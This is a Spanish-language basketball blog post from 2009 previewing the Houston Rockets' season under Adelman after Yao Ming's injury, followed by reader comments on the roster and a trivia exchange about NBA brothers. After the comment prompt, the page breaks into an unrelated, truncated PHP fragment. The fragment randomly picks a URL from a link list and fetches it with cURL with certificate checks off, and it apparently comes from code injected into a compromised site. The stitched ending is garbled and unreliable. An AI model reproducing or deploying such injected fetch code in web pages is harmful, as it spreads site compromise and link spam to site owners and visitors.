Houston Rockets: Nada que perder

20 de October de 2009 por Viva_Dirk

Después del gran sabor de boca dejado en la eliminatoria de 2ª ronda contra los Lakers, a los Rockets se les presentaba un verano interesante. La no renovación de Artest y la adquisición de Trevor Ariza en su lugar daban aire fresco y mayor estabilidad en el vestuario, pero en cuanto se confirmó la gravísima lesión de Yao Ming, de la que se llegó a decir que podía acabar con su carrera deportiva, el proyecto se fue al traste. La lesión del pívot chino, que finalmente sólo le separará de las canchas esta temporada, es la gota que colma el vaso de Houston. Desde que llegara McGrady en la temporada 2004/2005 a la franquicia solo han podido disfrutar de ellos juntos en unos play-offs. El resto de campañas han estado repleta de lesiones por parte de ambas estrellas.

Con este panorama se presenta el equipo de Adelman, un grupo de guerrilleros liderados por Luis Scola y él mismo. De hecho, son casi el mismo equipo que peleó de tu a tu con los Lakers pero esperar ese rendimiento durante 82 partidos de una plantilla extremadamente corta y joven, es mucho esperar.

El puesto de base es para uno de los jugadores más rápidos de la liga. Aaron Brooks cuenta entre sus virtudes con un tremendo desparpajo aunque posee un tiro bastante irregular y poca capacidad defensiva. Kyle Lowry, ex compañero de Pau Gasol en los Grizzlies, es capaz de mantener el ritmo de juego que ponga Brooks. Se trata de un buen base suplente más regular, aunque menos explosivo que su compañero .

A la espera de la recuperación de T-Mac (o lo que queda de él), las alas estarán cubiertas por una pareja de tremendos defensores, Shane Battier y Trevor Ariza. Battier es el chico bueno que todos conocemos: gran defensor, capaz de anotar los tiros abiertos y la extensión de Adelman en la pista. Ariza por primera vez tendrá ciertas exigencias debido al contrato de más de 30 millones de dólares que ha firmado. Con los Lakers mostró grandes cualidades para arropar a una estrella pero este año en Houston van a pedirle algo mas. Veremos como se desenvuelve el de UCLA porque su rol ideal a día de hoy parece ser el que tenía en Los Angeles. En la segunda ronda del draft eligieron al alero de Arizona Chase Budinguer. A pesar de ser elegido tan abajo me parece un jugador completísimo, con buen físico y grandes fundamentos. Debería disfrutar de bastantes minutos y garantizarse una larga carrera en la liga.

El juego interior estará liderado por Luis Scola. El argentino ha demostrado sobradamente sus cualidades en estos 2 años: luchador incansable bajo el aro, gran conocimiento del juego y un juego de pies como quedan pocos en la NBA- Este año puede hacer unos grandes números pero su impacto va más allá de ellos. Para acompañar a Scola las opciones son muy variadas, pero ninguna que pueda ni de lejos hacer olvidar la baja de Yao. Landry, Andersen, Hayes, Mensah-Bonsu y Dorsey, jugadores de todos los perfiles que bien manejados por Adelman pueden resultar un quebradero de cabeza para muchos equipos. Andersen y Landry deberían ser los que más minutos disputaran, aunque no sería de extrañar que le dieran una oportunidad a Joey Dorsey, gran reboteador e intimidador universitario.

A los Rockets sólo les queda esperar al verano que viene donde esperan contar de nuevo con Yao aunque sea a menor nivel, se acabará el contrato de T-Mac y posiblemente tengan una buena elección en el draft. Ingredientes interesantes para una pequeña reconstrucción.

Quinteto: Brooks-Ariza-Battier-Landry-Scola
Sexto hombre: Lowry

Pronóstico: Fuera de play-offs pero sin ser comparsa de nadie

Comenta

11 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Yo sí los veo como comparsa… lo van a pasar muy mal.
    Me recuerda a los últimos momentos de Adelman en Sacramento. Él es el puto amo… pero de donde no hay no se puede sacar. La plantilla que tiene es excesivamente floja. (quizás no para quedar últimos pero sí para quedar lejos de playoffs que es lo que pretenden sea el objetivo del equipo)
    Lástima, porque es un equipo que se ha ganado muchas simpatías precísamente desde que está Adelman jugando muy bien por momentos con apenas nada.

      Citar

  2. Dantley2 dice:
    #2

    También los veo como comparsa. No es ya que el quinteto esté cortito, es toda la plantilla. Ojalá que a Adelman le den más material, duele ver a un pedazo de entrenador en estas circunstancias. Pero eso sí, son gente con muchas ganas que venderán cada victoria cara.

      Citar

  3. sergio dice:
    #3

    Pues yo estoy de acuerdo con el analisis… me parecen todos jugadores bastante competitivos que no se van a perder en guerras internas y que van a jugar como equipo toda la temporada para callar algunas bocas. Yo los veo cerca (sin entrar) de Playoffs. El cuarteto de escoltas y aleros con Battier, Ariza (durante la pretemporada esta demostrando que asume nuevos roles), un McGrady recuperado y Budinguer me parece muy diverso en los ataques e intenso en defensa. Son todos faciles de mezclar entre la pista.

    Eso si, apostaria por Hayes y Scola como ala-pivot y pivot.

      Citar

  4. CAMPO2 dice:
    #4

    Yo me hubiera quedado a Von Wafer que era un desatasca partidos de los buenos, tengo ganas de ver lo que progresara Carl Landri, un jugador intenso donde los haya y creo que no entraran en play-offs a no ser que T-Mac en su ultimo año de contrato haga un temporadon para el año que viene encontrar un buen contrato como segunda o tercera espada.

      Citar

  5. kantonyo dice:
    #5

    Entonces, alguien sabe más o menos el estado en este momento de Tracy McGrady, no me ha quedado muy claro. Un saludo!!

      Citar

  6. Dantley2 dice:
    #6

    Según Houston Chronicle, McGrady aún está lejos de poder jugar. A finales de noviembre le harán otra exploración, aunque al menos ya no tiene dolor en la rodilla. Eso sin contar los temas de espalda. Dudoso lo veo.

      Citar

  7. Óscar dice:
    #7

    Los Rockets viven con el estigma permanente de las lesiones. Es una pena no haber visto al equipo completo desde hace años… Ya lo tienen asumido, pero lo de Yao es un golpe demasiado duro como para pensar en que se levanten una vez más. ¿Hasta dónde llegarían sin ese lastre? Podría darse el caso al menos un año, pero ya parece que no lo veremos.
    Aunque se recupere McGrady (y habría que ver cómo), la rotación interior parece poca cosa como para pensar en Playoffs. Yo veo a Scola y Andersen como pareja titular ; se pueden compenetrar bien. Pero los Hayes, Landry, Mensah-Bonsu o Dorsey estarían bien como complementos de otros titulares. Demasiados pocos centímetros.
    Por cierto, ví ayer al hermano de Carl Landry, Marcus, que está buscándose un hueco en los Knicks, metiendo 2/3 en triples en el último cuarto e importante en la victoria vs. NJN. No llevaba las gafas tipo “Worthy” que ha lucido los 4 años en Wisconsin, y jugó muy abierto con su 1,98. En la NCAA casi jugaba de “4”, y no tiraba tanto de fuera… A ver si se queda. Es clavadito a Carl, pero menos jugador.
    Por cierto, y hablando de hermanos, pregunta alternativa al concurso (donde llevo un rosco como una casa):
    ¿Cuántas parejas de hermanos pertenecían a plantillas de la NBA la temporada pasada, 2008/09? ¿Quiénes son? Yo me la sé, me lo apunté el año pasado !!!
    Ya lo sé, muy friqui…

      Citar

  8. kantonyo dice:
    #8

    A ver yo apuesto por los hermanos Gasol’s, Graham’s, Lopez’s, Collins’s, Rush’s … no se si habrá mas. este año ademas los hermanos Griffin.

      Citar

  9. Jabho dice:
    #9

    Muchos buenos complementos que con un par de estrellas sería un serio equipo…. pero claro, con las estrellas lesionadas el equipo queda corto. Pero este equipo con el mejor T-Mac y el mejor Yao sería un equipazo…. una pena

      Citar

  10. Óscar dice:
    #10

    Correcto, Kantonyo Puunto !!! jejeje. Eran esas 5 parejas. Hilando más fino, además son gemelos Jarron y Jason Collins, Brook y Robin Lopez (lo escriben sin tilde allí) y Joey y Stephen Graham.
    La leche cómo se parece Sonny Weems a los Graham. Ahora Weems está en los Raptors y Joey en los Nuggets. Es como si fuesen 3 hermanos, clavaos.
    Y este año van a estar los Griffin y si se quedase Marcus en NY, los Landry (en ninguno de los dos casos son gemelos). Igual nos dejamos alguno, pero no está nada mal la cantidad que hay…

      Citar

  11. Txusma dice:
    #11

    Veo que hay mono de Trivial… Habrá que sacar una nueva pregunta

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>